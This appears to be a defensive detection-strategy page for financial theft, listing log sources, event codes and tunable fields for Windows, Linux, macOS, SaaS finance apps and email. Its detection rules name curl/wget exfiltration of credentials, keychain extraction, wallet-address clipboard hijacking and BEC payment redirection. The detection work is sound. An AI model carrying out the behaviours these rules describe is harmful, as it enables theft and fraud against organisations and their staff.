Monitor for anomalous access to financial applications, browser-based banking sessions, or enterprise ERP systems from Windows endpoints. Detect mass emailing of payment instructions, sudden rule changes in Outlook for financial staff, or use of clipboard data exfiltration tied to cryptocurrency wallet addresses.
| Data Component | Name | Channel |
|---|---|---|
| Logon Session Creation (DC0067) | WinEventLog:Security | EventCode=4624 |
| Process Creation (DC0032) | WinEventLog:Sysmon | EventCode=1 |
| Field | Description |
|---|---|
| FinanceAppList | Baseline of finance-related executables or ERP processes to monitor closely. |
| HighRiskAccounts | Accounts belonging to finance, treasury, or executives that should be monitored with higher sensitivity. |
Monitor server and endpoint logs for unusual outbound network connections to cryptocurrency nodes, unauthorized scripts accessing financial systems, or automation targeting payment file formats. Detect curl/wget activity aimed at exfiltrating transaction data or credentials from financial apps.
| Data Component | Name | Channel |
|---|---|---|
| Command Execution (DC0064) | auditd:SYSCALL | execve: Execution of curl, wget, or custom scripts accessing financial endpoints |
| Application Log Content (DC0038) | linux:syslog | Authentication attempts into finance-related servers from unusual IPs or times |
| Field | Description |
|---|---|
| KnownFinanceIPs | Whitelisted IPs for finance-related traffic to reduce noise. |
Monitor unified logs for access to payment applications, browser plug-ins, or Apple Pay services from non-standard processes. Detect anomalous use of Automator scripts or keychain extraction targeting financial account credentials.
| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | macos:unifiedlog | Non-standard processes invoking financial applications or payment APIs |
| Application Log Content (DC0038) | macos:unifiedlog | Anomalous keychain access attempts targeting payment credentials |
| Field | Description |
|---|---|
| MonitoredApps | Financial or payment applications to explicitly monitor for unauthorized use. |
Monitor SaaS financial systems (e.g., QuickBooks, Workday, SAP S/4HANA cloud) for unauthorized access, rule changes, or mass export of financial data. Detect anomalous transfers initiated via SaaS APIs or new MFA-disabled logins targeting finance apps.
| Data Component | Name | Channel |
|---|---|---|
| Application Log Content (DC0038) | saas:finance | Transaction/Transfer: Unusual or large transactions initiated outside business hours or by unusual accounts |
| Field | Description |
|---|---|
| TransactionThreshold | Customizable monetary threshold above which financial transactions should be flagged. |
Monitor email and document management systems for fraudulent invoices, impersonation of vendors, or BEC-style payment redirections. Detect abnormal editing of invoice templates, or emails containing known fraud language combined with attachment delivery.
| Data Component | Name | Channel |
|---|---|---|
| Application Log Content (DC0038) | m365:unified | MailSend: Outlook messages with suspicious subject/body terms (e.g., urgent payment, wire transfer) targeting finance teams |
| File Modification (DC0061) | m365:office | Anomalous editing of invoice or payment document templates |
| Field | Description |
|---|---|
| FraudTerms | Adjustable keyword list for email and document fraud detection. |